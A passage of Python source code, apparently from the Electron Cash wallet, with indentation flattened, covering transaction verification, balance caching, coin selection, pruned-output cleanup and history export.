self._change_address_set_cached = frozenset(ca)
return address in self._change_address_set_cached
def get_address_index(self, address):
try:
return False, self.receiving_addresses.index(address)
except ValueError:
pass
try:
return True, self.change_addresses.index(address)
except ValueError:
pass
assert not isinstance(address, str)
raise Exception("Address {} not found".format(address))
def export_private_key(self, address, password):
""" extended WIF format """
if self.is_watching_only():
return []
index = self.get_address_index(address)
pk, compressed = self.keystore.get_private_key(index, password)
return bitcoin.serialize_privkey(pk, compressed, self.txin_type)
def get_public_keys(self, address):
sequence = self.get_address_index(address)
return self.get_pubkeys(*sequence)
def add_unverified_tx(self, tx_hash, tx_height):
with self.lock:
if tx_height == 0 and tx_hash in self.verified_tx:
self.verified_tx.pop(tx_hash)
if self.verifier:
self.verifier.merkle_roots.pop(tx_hash, None)
# tx will be verified only if height > 0
if tx_hash not in self.verified_tx:
self.unverified_tx[tx_hash] = tx_height
self.cashacct.add_unverified_tx_hook(tx_hash, tx_height)
def add_verified_tx(self, tx_hash, info, header):
# Remove from the unverified map and add to the verified map and
with self.lock:
self.unverified_tx.pop(tx_hash, None)
self.verified_tx[tx_hash] = info # (tx_height, timestamp, pos)
height, conf, timestamp = self.get_tx_height(tx_hash)
self.cashacct.add_verified_tx_hook(tx_hash, info, header)
self.network.trigger_callback('verified2', self, tx_hash, height, conf, timestamp)
def verification_failed(self, tx_hash, reason):
''' TODO: Notify gui of this if it keeps happening, try a different
server, rate-limited retries, etc '''
self.cashacct.verification_failed_hook(tx_hash, reason)
def get_unverified_txs(self):
'''Returns a map from tx hash to transaction height'''
with self.lock:
return self.unverified_tx.copy()
def get_unverified_tx_pending_count(self):
''' Returns the number of unverified tx's that are confirmed and are
still in process and should be verified soon.'''
with self.lock:
return len([1 for height in self.unverified_tx.values() if height > 0])
def undo_verifications(self, blockchain, height):
'''Used by the verifier when a reorg has happened'''
txs = set()
with self.lock:
for tx_hash, item in list(self.verified_tx.items()):
tx_height, timestamp, pos = item
if tx_height >= height:
header = blockchain.read_header(tx_height)
# fixme: use block hash, not timestamp
if not header or header.get('timestamp') != timestamp:
self.verified_tx.pop(tx_hash, None)
txs.add(tx_hash)
if txs: self.cashacct.undo_verifications_hook(txs)
if txs:
self._addr_bal_cache = {} # this is probably not necessary -- as the receive_history_callback will invalidate bad cache items -- but just to be paranoid we clear the whole balance cache on reorg anyway as a safety measure
return txs
def get_local_height(self):
""" return last known height if we are offline """
return self.network.get_local_height() if self.network else self.storage.get('stored_height', 0)
def get_tx_height(self, tx_hash):
""" return the height and timestamp of a verified transaction. """
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
conf = max(self.get_local_height() - height + 1, 0)
return height, conf, timestamp
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return height, 0, 0
else:
return 0, 0, 0
def get_tx_block_hash(self, tx_hash):
''' Only works for tx's in wallet, for which we know the height. '''
height, ign, ign2 = self.get_tx_height(tx_hash)
return self.get_block_hash(height)
def get_block_hash(self, height):
'''Convenience method equivalent to Blockchain.get_height(), except our
version returns None instead of NULL_HASH_HEX on 'not found' header. '''
ret = None
if self.network and height is not None and height >= 0 and height <= self.get_local_height():
bchain = self.network.blockchain()
if bchain:
ret = bchain.get_hash(height)
if ret == NULL_HASH_HEX:
# if hash was NULL (all zeroes), prefer to return None
ret = None
return ret
def get_txpos(self, tx_hash):
"return position, even if the tx is unverified"
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
return height, pos
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return (height, 0) if height > 0 else ((1e9 - height), 0)
else:
return (1e9+1, 0)
def is_found(self):
return any(value for value in self._history.values())
def get_num_tx(self, address):
""" return number of transactions where address is involved """
return len(self.get_address_history(address))
def get_tx_delta(self, tx_hash, address):
assert isinstance(address, Address)
"effect of tx on address"
# pruned
if tx_hash in self.pruned_txo_values:
return None
delta = 0
# substract the value of coins sent from address
d = self.txi.get(tx_hash, {}).get(address, [])
for n, v in d:
delta -= v
# add the value of the coins received at address
d = self.txo.get(tx_hash, {}).get(address, [])
for n, v, cb in d:
delta += v
return delta
def get_wallet_delta(self, tx):
""" effect of tx on wallet """
is_relevant = False
is_mine = False
is_pruned = False
is_partial = False
v_in = v_out = v_out_mine = 0
for item in tx.inputs():
addr = item['address']
if self.is_mine(addr):
is_mine = True
is_relevant = True
d = self.txo.get(item['prevout_hash'], {}).get(addr, [])
for n, v, cb in d:
if n == item['prevout_n']:
value = v
break
else:
value = None
if value is None:
is_pruned = True
else:
v_in += value
else:
is_partial = True
if not is_mine:
is_partial = False
for _type, addr, value in tx.outputs():
v_out += value
if self.is_mine(addr):
v_out_mine += value
is_relevant = True
if is_pruned:
# some inputs are mine:
fee = None
if is_mine:
v = v_out_mine - v_out
else:
# no input is mine
v = v_out_mine
else:
v = v_out_mine - v_in
if is_partial:
# some inputs are mine, but not all
fee = None
else:
# all inputs are mine
fee = v_in - v_out
if not is_mine:
fee = None
return is_relevant, is_mine, v, fee
def get_tx_info(self, tx):
is_relevant, is_mine, v, fee = self.get_wallet_delta(tx)
exp_n = None
can_broadcast = False
label = ''
height = conf = timestamp = None
tx_hash = tx.txid()
if tx.is_complete():
if tx_hash in self.transactions:
label = self.get_label(tx_hash)
height, conf, timestamp = self.get_tx_height(tx_hash)
if height > 0:
if conf:
status = ngettext("{conf} confirmation", "{conf} confirmations", conf).format(conf=conf)
else:
status = _('Not verified')
else:
status = _('Unconfirmed')
if fee is None:
fee = self.tx_fees.get(tx_hash)
if fee and self.network and self.network.config.has_fee_estimates():
# NB: this branch will not be taken as has_fee_estimates()
# will always return false since we disabled querying
# the fee histogram as it's useless for BCH anyway.
size = tx.estimated_size()
fee_per_kb = fee * 1000 / size
exp_n = self.network.config.reverse_dynfee(fee_per_kb)
else:
status = _("Signed")
can_broadcast = self.network is not None
else:
s, r = tx.signature_count()
status = _("Unsigned") if s == 0 else _('Partially signed') + ' (%d/%d)'%(s,r)
if is_relevant:
if is_mine:
if fee is not None:
amount = v + fee
else:
amount = v
else:
amount = v
else:
amount = None
return tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n
def get_addr_io(self, address):
h = self.get_address_history(address)
received = {}
sent = {}
for tx_hash, height in h:
l = self.txo.get(tx_hash, {}).get(address, [])
for n, v, is_cb in l:
received[tx_hash + ':%d'%n] = (height, v, is_cb)
for tx_hash, height in h:
l = self.txi.get(tx_hash, {}).get(address, [])
for txi, v in l:
sent[txi] = height
return received, sent
def get_addr_utxo(self, address):
coins, spent = self.get_addr_io(address)
for txi in spent:
coins.pop(txi)
# cleanup/detect if the 'frozen coin' was spent and remove it from the frozen coin set
self.frozen_coins.discard(txi)
self.frozen_coins_tmp.discard(txi)
out = {}
for txo, v in coins.items():
tx_height, value, is_cb = v
prevout_hash, prevout_n = txo.split(':')
x = {
'address':address,
'value':value,
'prevout_n':int(prevout_n),
'prevout_hash':prevout_hash,
'height':tx_height,
'coinbase':is_cb,
'is_frozen_coin':txo in self.frozen_coins or txo in self.frozen_coins_tmp,
'slp_token':self.slp.token_info_for_txo(txo), # (token_id_hex, qty) tuple or None
}
out[txo] = x
return out
# return the total amount ever received by an address
def get_addr_received(self, address):
received, sent = self.get_addr_io(address)
return sum([v for height, v, is_cb in received.values()])
def get_addr_balance(self, address, exclude_frozen_coins=False):
''' Returns the balance of a bitcoin address as a tuple of:
(confirmed_matured, unconfirmed, unmatured)
Note that 'exclude_frozen_coins = True' only checks for coin-level
freezing, not address-level. '''
assert isinstance(address, Address)
mempoolHeight = self.get_local_height() + 1
if not exclude_frozen_coins: # we do not use the cache when excluding frozen coins as frozen status is a dynamic quantity that can change at any time in the UI
cached = self._addr_bal_cache.get(address)
if cached is not None:
return cached
received, sent = self.get_addr_io(address)
c = u = x = 0
had_cb = False
for txo, (tx_height, v, is_cb) in received.items():
if exclude_frozen_coins and (txo in self.frozen_coins or txo in self.frozen_coins_tmp):
continue
had_cb = had_cb or is_cb # remember if this address has ever seen a coinbase txo
if is_cb and tx_height + COINBASE_MATURITY > mempoolHeight:
x += v
elif tx_height > 0:
c += v
else:
u += v
if txo in sent:
if sent[txo] > 0:
c -= v
else:
u -= v
result = c, u, x
if not exclude_frozen_coins and not had_cb:
# Cache the results.
# Cache needs to be invalidated if a transaction is added to/
# removed from addr history. (See self._addr_bal_cache calls
# related to this littered throughout this file).
#
# Note that as a performance tweak we don't ever cache balances for
# addresses involving coinbase coins. The rationale being as
# follows: Caching of balances of the coinbase addresses involves
# a dynamic quantity: maturity of the coin (which considers the
# ever-changing block height).
#
# There wasn't a good place in this codebase to signal the maturity
# happening (and thus invalidate the cache entry for the exact
# address that holds the coinbase coin in question when a new
# block is found that matures a coinbase coin).
#
# In light of that fact, a possible approach would be to invalidate
# this entire cache when a new block arrives (this is what Electrum
# does). However, for Electron Cash with its focus on many addresses
# for future privacy features such as integrated CashShuffle --
# being notified in the wallet and invalidating the *entire* cache
# whenever a new block arrives (which is the exact time you do
# the most GUI refreshing and calling of this function) seems a bit
# heavy-handed, just for sake of the (relatively rare, for the
# average user) coinbase-carrying addresses.
#
# It's not a huge performance hit for the coinbase addresses to
# simply not cache their results, and have this function recompute
# their balance on each call, when you consider that as a
# consequence of this policy, all the other addresses that are
# non-coinbase can benefit from a cache that stays valid for longer
# than 1 block (so long as their balances haven't changed).
self._addr_bal_cache[address] = result
return result
def get_spendable_coins(self, domain, config, isInvoice = False):
confirmed_only = config.get('confirmed_only', DEFAULT_CONFIRMED_ONLY)
if (isInvoice):
confirmed_only = True
return self.get_utxos(domain, exclude_frozen=True, mature=True, confirmed_only=confirmed_only, exclude_slp=True)
def get_utxos(self, domain = None, exclude_frozen = False, mature = False, confirmed_only = False,
*, addr_set_out = None, exclude_slp = True):
'''Note that exclude_frozen = True checks for BOTH address-level and
coin-level frozen status.
exclude_slp skips coins that also have SLP tokens on them. This defaults
to True in EC 4.0.10+ in order to prevent inadvertently burning tokens.
Optional kw-only arg `addr_set_out` specifies a set in which to add all
addresses encountered in the utxos returned. '''
with self.lock:
mempoolHeight = self.get_local_height() + 1
coins = []
if domain is None:
domain = self.get_addresses()
if exclude_frozen:
domain = set(domain) - self.frozen_addresses
for addr in domain:
utxos = self.get_addr_utxo(addr)
len_before = len(coins)
for x in utxos.values():
if exclude_slp and x['slp_token']:
continue
if exclude_frozen and x['is_frozen_coin']:
continue
if confirmed_only and x['height'] <= 0:
continue
# A note about maturity: Previous versions of Electrum
# and Electron Cash were off by one. Maturity is
# calculated based off mempool height (chain tip height + 1).
# See bitcoind consensus/tx_verify.cpp Consensus::CheckTxInputs
# and also txmempool.cpp CTxMemPool::removeForReorg.
if mature and x['coinbase'] and mempoolHeight - x['height'] < COINBASE_MATURITY:
continue
coins.append(x)
if addr_set_out is not None and len(coins) > len_before:
# add this address to the address set if it has results
addr_set_out.add(addr)
return coins
def dummy_address(self):
return self.get_receiving_addresses()[0]
def get_addresses(self):
return self.get_receiving_addresses() + self.get_change_addresses()
def get_change_addresses(self):
''' Reimplemented in subclasses for wallets that have a change address set/derivation path. '''
return []
def get_frozen_balance(self):
if not self.frozen_coins and not self.frozen_coins_tmp:
# performance short-cut -- get the balance of the frozen address set only IFF we don't have any frozen coins
return self.get_balance(self.frozen_addresses)
# otherwise, do this more costly calculation...
cc_no_f, uu_no_f, xx_no_f = self.get_balance(None, exclude_frozen_coins = True, exclude_frozen_addresses = True)
cc_all, uu_all, xx_all = self.get_balance(None, exclude_frozen_coins = False, exclude_frozen_addresses = False)
return (cc_all-cc_no_f), (uu_all-uu_no_f), (xx_all-xx_no_f)
def get_balance(self, domain=None, exclude_frozen_coins=False, exclude_frozen_addresses=False):
if domain is None:
domain = self.get_addresses()
if exclude_frozen_addresses:
domain = set(domain) - self.frozen_addresses
cc = uu = xx = 0
for addr in domain:
c, u, x = self.get_addr_balance(addr, exclude_frozen_coins)
cc += c
uu += u
xx += x
return cc, uu, xx
def get_address_history(self, address):
assert isinstance(address, Address)
return self._history.get(address, [])
def _clean_pruned_txo_thread(self):
''' Runs in the thread self.pruned_txo_cleaner_thread which is only
active if self.network. Cleans the self.pruned_txo dict and the
self.pruned_txo_values set of spends that are not relevant to the
wallet. The processing below is needed because as of 9/16/2019, Electron
Cash temporarily puts all spends that pass through add_transaction and
have an unparseable address (txi['address'] is None) into the dict
self.pruned_txo. This is necessary for handling tx's with esoteric p2sh
scriptSigs and detecting balance changes properly for txins
containing such scriptSigs. See #895. '''
def deser(ser):
prevout_hash, prevout_n = ser.split(':')
prevout_n = int(prevout_n)
return prevout_hash, prevout_n
def mkser(prevout_hash, prevout_n):
return f'{prevout_hash}:{prevout_n}'
def rm(ser, pruned_too=True, *, tup = None):
h, n = tup or deser(ser) # tup arg is for performance when caller already knows the info (avoid a redundant .split on ':')
s = txid_n[h]
s.discard(n)
if not s:
txid_n.pop(h, None)
if pruned_too:
with self.lock:
tx_hash = self.pruned_txo.pop(ser, None)
self.pruned_txo_values.discard(tx_hash)
def add(ser):
prevout_hash, prevout_n = deser(ser)
txid_n[prevout_hash].add(prevout_n)
def keep_running():
return bool(self.network and self.pruned_txo_cleaner_thread is me)
def can_do_work():
return bool(txid_n and self.is_up_to_date())
debug = False # set this to true here to get more verbose output
me = threading.current_thread()
q = me.q
me.txid_n = txid_n = defaultdict(set) # dict of prevout_hash -> set of prevout_n (int)
last = time.time()
try:
self.print_error(f"{me.name}: thread started")
with self.lock:
# Setup -- grab whatever was already in pruned_txo at thread
# start
for ser in self.pruned_txo:
h, n = deser(ser)
txid_n[h].add(n)
while keep_running():
try:
ser = q.get(timeout=5.0 if can_do_work() else 20.0)
if ser is None:
# quit thread
return
if ser.startswith('r_'):
# remove requested
rm(ser[2:], False)
else:
# ser was added
add(ser)
del ser
except queue.Empty:
pass
if not can_do_work():
continue
t0 = time.time()
if t0 - last < 1.0: # run no more often than once per second
continue
last = t0
defunct_ct = 0
for prevout_hash, s in txid_n.copy().items():
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
with self.lock:
defunct = ser not in self.pruned_txo
if defunct:
#self.print_error(f"{me.name}: skipping already-cleaned", ser)
rm(ser, False, tup=(prevout_hash, prevout_n))
defunct_ct += 1
continue
if defunct_ct and debug:
self.print_error(f"{me.name}: DEBUG", defunct_ct, "defunct txos removed in", time.time()-t0, "secs")
ct = 0
for prevout_hash, s in txid_n.copy().items():
try:
with self.lock:
tx = self.transactions.get(prevout_hash)
if tx is None:
tx = Transaction.tx_cache_get(prevout_hash)
if isinstance(tx, Transaction):
tx = Transaction(tx.raw) # take a copy
else:
if debug: self.print_error(f"{me.name}: DEBUG retrieving txid", prevout_hash, "...")
t1 = time.time()
tx = Transaction(self.network.synchronous_get(('blockchain.transaction.get', [prevout_hash])))
if debug: self.print_error(f"{me.name}: DEBUG network retrieve took", time.time()-t1, "secs")
# Paranoia; intended side effect of the below assert
# is to also deserialize the tx (by calling the slow
# .txid()) which ensures the tx from the server
# is not junk.
assert prevout_hash == tx.txid(), "txid mismatch"
Transaction.tx_cache_put(tx, prevout_hash) # will cache a copy
except Exception as e:
self.print_error(f"{me.name}: Error retrieving txid", prevout_hash, ":", repr(e))
if not keep_running(): # in case we got a network timeout *and* the wallet was closed
return
continue
if not keep_running():
return
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
try:
txo = tx.outputs()[prevout_n]
except IndexError:
self.print_error(f"{me.name}: ERROR -- could not find output", ser)
rm(ser, True, tup=(prevout_hash, prevout_n))
continue
_typ, addr, v = txo
rm_pruned_too = False
with self.lock:
mine = self.is_mine(addr)
if not mine and ser in self.pruned_txo:
ct += 1
rm_pruned_too = True
rm(ser, rm_pruned_too, tup=(prevout_hash, prevout_n))
if rm_pruned_too and debug:
self.print_error(f"{me.name}: DEBUG removed", ser)
if ct:
with self.lock:
# Save changes to storage -- this is cheap and doesn't
# actually write to file yet, just flags storage as
# 'dirty' for when wallet.storage.write() is called
# later.
self.storage.put('pruned_txo', self.pruned_txo)
self.print_error(f"{me.name}: removed", ct,
"(non-relevant) pruned_txo's in",
f'{time.time()-t0:3.2f}', "seconds")
except:
import traceback
self.print_error(f"{me.name}:", traceback.format_exc())
raise
finally:
self.print_error(f"{me.name}: thread exiting")
def add_transaction(self, tx_hash, tx):
if not tx.inputs():
# bad tx came in off the wire -- all 0's or something, see #987
self.print_error("add_transaction: WARNING a tx came in from the network with 0 inputs! Bad server? Ignoring tx:", tx_hash)
return
is_coinbase = tx.inputs()[0]['type'] == 'coinbase'
with self.lock:
# HELPER FUNCTIONS
def add_to_self_txi(tx_hash, addr, ser, v):
''' addr must be 'is_mine' '''
d = self.txi.get(tx_hash)
if d is None:
self.txi[tx_hash] = d = {}
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((ser, v))
def find_in_self_txo(prevout_hash: str, prevout_n: int) -> tuple:
''' Returns a tuple of the (Address,value) for a given
prevout_hash:prevout_n, or (None, None) if not found. If valid
return, the Address object is found by scanning self.txo. The
lookup below is relatively fast in practice even on pathological
wallets. '''
dd = self.txo.get(prevout_hash, {})
for addr2, item in dd.items():
for n, v, is_cb in item:
if n == prevout_n:
return addr2, v
return (None, None)
def txin_get_info(txin):
prevout_hash = txi['prevout_hash']
prevout_n = txi['prevout_n']
ser = prevout_hash + ':%d'%prevout_n
return prevout_hash, prevout_n, ser
def put_pruned_txo(ser, tx_hash):
self.pruned_txo[ser] = tx_hash
self.pruned_txo_values.add(tx_hash)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put(ser)
def pop_pruned_txo(ser):
next_tx = self.pruned_txo.pop(ser, None)
if next_tx:
self.pruned_txo_values.discard(next_tx)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put('r_' + ser) # notify of removal
return next_tx
# /HELPER FUNCTIONS
# add inputs
self.txi[tx_hash] = d = {}
for txi in tx.inputs():
if txi['type'] == 'coinbase':
continue
addr = txi.get('address')
# find value from prev output
if self.is_mine(addr):
prevout_hash, prevout_n, ser = txin_get_info(txi)
dd = self.txo.get(prevout_hash, {})
for n, v, is_cb in dd.get(addr, []):
if n == prevout_n:
add_to_self_txi(tx_hash, addr, ser, v)
break
else:
# Coin's spend tx came in before its receive tx: flag
# the spend for when the receive tx will arrive into
# this function later.
put_pruned_txo(ser, tx_hash)
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
del dd, prevout_hash, prevout_n, ser
elif addr is None:
# Unknown/unparsed address.. may be a strange p2sh scriptSig
# Try and find it in txout's if it's one of ours.
# See issue #895.
prevout_hash, prevout_n, ser = txin_get_info(txi)
# Find address in self.txo for this prevout_hash:prevout_n
addr2, v = find_in_self_txo(prevout_hash, prevout_n)
if addr2 is not None and self.is_mine(addr2):
add_to_self_txi(tx_hash, addr2, ser, v)
self._addr_bal_cache.pop(addr2, None) # invalidate cache entry
else:
# Not found in self.txo. It may still be one of ours
# however since tx's can come in out of order due to
# CTOR, etc, and self.txo may not have it yet. So we
# flag the spend now, and when the out-of-order prevout
# tx comes in later for this input (if it's indeed one
# of ours), the real address for this input will get
# picked up then in the "add outputs" section below in
# this function. At that point, self.txi will be
# properly updated to indicate the coin in question was
# spent via an add_to_self_txi call.
#
# If it's *not* one of ours, however, the below will
# grow pruned_txo with an irrelevant entry. However, the
# irrelevant entry will eventually be reaped and removed
# by the self.pruned_txo_cleaner_thread which runs
# periodically in the background.
put_pruned_txo(ser, tx_hash)
del addr2, v, prevout_hash, prevout_n, ser
# don't keep empty entries in self.txi
if not d:
self.txi.pop(tx_hash, None)
# add outputs
self.txo[tx_hash] = d = {}
op_return_ct = 0
deferred_cashacct_add = None
for n, txo in enumerate(tx.outputs()):
ser = tx_hash + ':%d'%n
_type, addr, v = txo
mine = False
if isinstance(addr, ScriptOutput):
if addr.is_opreturn():
op_return_ct += 1
if isinstance(addr, cashacct.ScriptOutput):
# auto-detect CashAccount registrations we see,
# and notify cashacct subsystem of that fact. But we
# can only do it after making sure it's the *only*
# OP_RETURN in the tx.
deferred_cashacct_add = (
lambda _tx_hash=tx_hash, _tx=tx, _n=n, _addr=addr:
self.cashacct.add_transaction_hook(_tx_hash, _tx, _n, _addr)
)
elif self.is_mine(addr):
# add coin to self.txo since it's mine.
mine = True
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((n, v, is_coinbase))
del l
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
# give v to txi that spends me
next_tx = pop_pruned_txo(ser)
if next_tx is not None and mine:
add_to_self_txi(next_tx, addr, ser, v)
# don't keep empty entries in self.txo
if not d:
self.txo.pop(tx_hash, None)
# save
self.transactions[tx_hash] = tx
# Invoke the cashacct add hook (if defined) here at the end, with
# the lock held. We accept the cashacct.ScriptOutput only iff
# op_return_ct == 1 as per the Cash Accounts spec.
# See: https://gitlab.com/cash-accounts/lookup-server/blob/master/routes/parser.js#L253
if op_return_ct == 1 and deferred_cashacct_add:
deferred_cashacct_add()
# Unconditionally invoke the SLP handler. Note that it is a fast &
# cheap no-op if this tx's outputs[0] is not an SLP script.
self.slp.add_tx(tx_hash, tx)
def remove_transaction(self, tx_hash):
with self.lock:
self.print_error("removing tx from history", tx_hash)
# Note that we don't actually remove the tx_hash from
# self.transactions, but instead rely on the unreferenced tx being
# removed the next time the wallet is loaded in self.load_transactions()
for ser, hh in list(self.pruned_txo.items()):
if hh == tx_hash:
self.pruned_txo.pop(ser)
self.pruned_txo_values.discard(hh)
# add tx to pruned_txo, and undo the txi addition
for next_tx, dd in self.txi.items():
for addr, l in list(dd.items()):
ll = l[:]
for item in ll:
ser, v = item
prev_hash, prev_n = ser.split(':')
if prev_hash == tx_hash:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
l.remove(item)
self.pruned_txo[ser] = next_tx
self.pruned_txo_values.add(next_tx)
if l == []:
dd.pop(addr)
else:
dd[addr] = l
# invalidate addr_bal_cache for outputs involving this tx
d = self.txo.get(tx_hash, {})
for addr in d:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
try: self.txi.pop(tx_hash)
except KeyError: self.print_error("tx was not in input history", tx_hash)
try: self.txo.pop(tx_hash)
except KeyError: self.print_error("tx was not in output history", tx_hash)
# do this with the lock held
self.cashacct.remove_transaction_hook(tx_hash)
# inform slp subsystem as well
self.slp.rm_tx(tx_hash)
def receive_tx_callback(self, tx_hash, tx, tx_height):
self.add_transaction(tx_hash, tx)
self.add_unverified_tx(tx_hash, tx_height)
if self.network and self.network.callback_listener_count("payment_received") > 0:
for _, addr, _ in tx.outputs():
status = self.get_request_status(addr) # returns PR_UNKNOWN quickly if addr has no requests, otherwise returns tuple
if status != PR_UNKNOWN:
status = status[0] # unpack status from tuple
self.network.trigger_callback('payment_received', self, addr, status)
def receive_history_callback(self, addr, hist, tx_fees):
with self.lock:
old_hist = self.get_address_history(addr)
for tx_hash, height in old_hist:
if (tx_hash, height) not in hist:
s = self.tx_addr_hist.get(tx_hash)
if s:
s.discard(addr)
if not s:
# if no address references this tx anymore, kill it
# from txi/txo dicts.
if s is not None:
# We won't keep empty sets around.
self.tx_addr_hist.pop(tx_hash)
# note this call doesn't actually remove the tx from
# storage, it merely removes it from the self.txi
# and self.txo dicts
self.remove_transaction(tx_hash)
self._addr_bal_cache.pop(addr, None) # unconditionally invalidate cache entry
self._history[addr] = hist
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# add reference in tx_addr_hist
self.tx_addr_hist[tx_hash].add(addr)
# if addr is new, we have to recompute txi and txo
tx = self.transactions.get(tx_hash)
if tx is not None and self.txi.get(tx_hash, {}).get(addr) is None and self.txo.get(tx_hash, {}).get(addr) is None:
self.add_transaction(tx_hash, tx)
# Store fees
self.tx_fees.update(tx_fees)
if self.network:
self.network.trigger_callback('on_history', self)
def add_tx_to_history(self, txid):
with self.lock:
for addr in itertools.chain(list(self.txi.get(txid, {}).keys()), list(self.txo.get(txid, {}).keys())):
cur_hist = self._history.get(addr, list())
if not any(True for x in cur_hist if x[0] == txid):
cur_hist.append((txid, 0))
self._history[addr] = cur_hist
def get_history(self, domain=None, *, reverse=False):
# get domain
if domain is None:
domain = self.get_addresses()
# 1. Get the history of each address in the domain, maintain the
# delta of a tx as the sum of its deltas on domain addresses
tx_deltas = defaultdict(int)
for addr in domain:
h = self.get_address_history(addr)
for tx_hash, height in h:
delta = self.get_tx_delta(tx_hash, addr)
if delta is None or tx_deltas[tx_hash] is None:
tx_deltas[tx_hash] = None
else:
tx_deltas[tx_hash] += delta
# 2. create sorted history
history = []
for tx_hash in tx_deltas:
delta = tx_deltas[tx_hash]
height, conf, timestamp = self.get_tx_height(tx_hash)
history.append((tx_hash, height, conf, timestamp, delta))
history.sort(key = lambda x: self.get_txpos(x[0]), reverse=True)
# 3. add balance
c, u, x = self.get_balance(domain)
balance = c + u + x
h2 = []
for tx_hash, height, conf, timestamp, delta in history:
h2.append((tx_hash, height, conf, timestamp, delta, balance))
if balance is None or delta is None:
balance = None
else:
balance -= delta
if not reverse:
h2.reverse()
return h2
def export_history(self, domain=None, from_timestamp=None, to_timestamp=None, fx=None,
show_addresses=False, decimal_point=8,
*, fee_calc_timeout=10.0, download_inputs=False,
progress_callback=None):
''' Export history. Used by RPC & GUI.
Arg notes:
- `fee_calc_timeout` is used when computing the fee (which is done
asynchronously in another thread) to limit the total amount of time in
seconds spent waiting for fee calculation. The timeout is a total time
allotment for this function call. (The reason the fee calc can take a
long time is for some pathological tx's, it is very slow to calculate
fee as it involves deserializing prevout_tx from the wallet, for each
input).
- `download_inputs`, if True, will allow for more accurate fee data to
be exported with the history by using the Transaction class input
fetcher to download *all* prevout_hash tx's for inputs (even for
inputs not in wallet). This feature requires self.network (ie, we need
to be online) otherwise it will behave as if download_inputs=False.
- `progress_callback`, if specified, is a callback which receives a
single float argument in the range [0.0,1.0] indicating how far along
the history export is going. This is intended for interop with GUI
code. Node the progress callback is not guaranteed to be called in the
context of the main thread, therefore GUI code should use appropriate
signals/slots to update the GUI with progress info.
Note on side effects: This function may update self.tx_fees. Rationale:
it will spend some time trying very hard to calculate accurate fees by
examining prevout_tx's (leveraging the fetch_input_data code in the
Transaction class). As such, it is worthwhile to cache the results in
self.tx_fees, which gets saved to wallet storage. This is not very
demanding on storage as even for very large wallets with huge histories,
tx_fees does not use more than a few hundred kb of space. '''
from .util import timestamp_to_datetime
# we save copies of tx's we deserialize to this temp dict because we do
# *not* want to deserialize tx's in wallet.transactoins since that
# wastes memory
local_tx_cache = {}
# some helpers for this function
t0 = time.time()
def time_remaining(): return max(fee_calc_timeout - (time.time()-t0), 0)
class MissingTx(RuntimeError):
''' Can happen in rare circumstances if wallet history is being
radically reorged by network thread while we are in this code. '''
def get_tx(tx_hash):
''' Try to get a tx from wallet, then from the Transaction class
cache if that fails. In either case it deserializes the copy and
puts the deserialized tx in local stack dict local_tx_cache. The
reason we don't deserialize the tx's from self.transactions is that
we do not want to keep deserialized tx's in memory. The
self.transactions dict should contain just raw tx's (not
deserialized). Deserialized tx's eat on the order of 10x the memory
because because of the Python lists, dict, etc they contain, per
instance. '''
tx = local_tx_cache.get(tx_hash)
if tx:
return tx
tx = Transaction.tx_cache_get(tx_hash)
if not tx:
tx = copy.deepcopy(self.transactions.get(tx_hash))
if tx:
tx.deserialize()
local_tx_cache[tx_hash] = tx
else:
raise MissingTx(f'txid {tx_hash} dropped out of wallet history while exporting')
return tx
def try_calc_fee(tx_hash):
''' Try to calc fee from cheapest to most expensive calculation.
Ultimately asks the transaction class to look at prevouts in wallet and uses
that scheme as a last (more CPU intensive) resort. '''
fee = self.tx_fees.get(tx_hash)
if fee is not None:
return fee
def do_get_fee(tx_hash):
tx = get_tx(tx_hash)
def try_get_fee(tx):
try: return tx.get_fee()
except InputValueMissing: pass
fee = try_get_fee(tx)
t_remain = time_remaining()
if fee is None and t_remain:
q = queue.Queue()
def done():
q.put(1)
tx.fetch_input_data(self, use_network=bool(download_inputs), done_callback=done)
try: q.get(timeout=t_remain)
except queue.Empty: pass
fee = try_get_fee(tx)
return fee
fee = do_get_fee(tx_hash)
if fee is not None:
self.tx_fees[tx_hash] = fee # save fee to wallet if we bothered to dl/calculate it.
return fee
def fmt_amt(v, is_diff):
if v is None:
return '--'
return format_satoshis(v, decimal_point=decimal_point,
is_diff=is_diff)
# grab history
h = self.get_history(domain, reverse=True)
out = []
n, l = 0, max(1, float(len(h)))
for tx_hash, height, conf, timestamp, value, balance in h:
if progress_callback:
progress_callback(n/l)
n += 1
timestamp_safe = timestamp
if timestamp is None:
timestamp_safe = time.time() # set it to "now" so below code doesn't explode.
if from_timestamp and timestamp_safe < from_timestamp:
continue
if to_timestamp and timestamp_safe >= to_timestamp:
continue
try:
fee = try_calc_fee(tx_hash)
except MissingTx as e:
self.print_error(str(e))
continue
item = {
'txid' : tx_hash,
'height' : height,
'confirmations' : conf,
'timestamp' : timestamp_safe,
'value' : fmt_amt(value, is_diff=True),
'fee' : fmt_amt(fee, is_diff=False),
'balance' : fmt_amt(balance, is_diff=False),
}
if item['height'] > 0:
date_str = format_time(timestamp) if timestamp is not None else _("unverified")
else:
date_str = _("unconfirmed")
item['date'] = date_str
try:
# Defensive programming.. sanitize label.
# The below ensures strings are utf8-encodable. We do this
# as a paranoia measure.
item['label'] = self.get_label(tx_hash).encode(encoding='utf-8', errors='replace').decode(encoding='utf-8', errors='replace')
except UnicodeError:
self.print_error(f"Warning: could not export label for {tx_hash}, defaulting to ???")
item['label'] = "???"
if show_addresses:
tx = get_tx(tx_hash)
input_addresses = []
output_addresses = []
for x in tx.inputs():
if x['type'] == 'coinbase': continue
addr = x.get('address')
if addr == None: continue
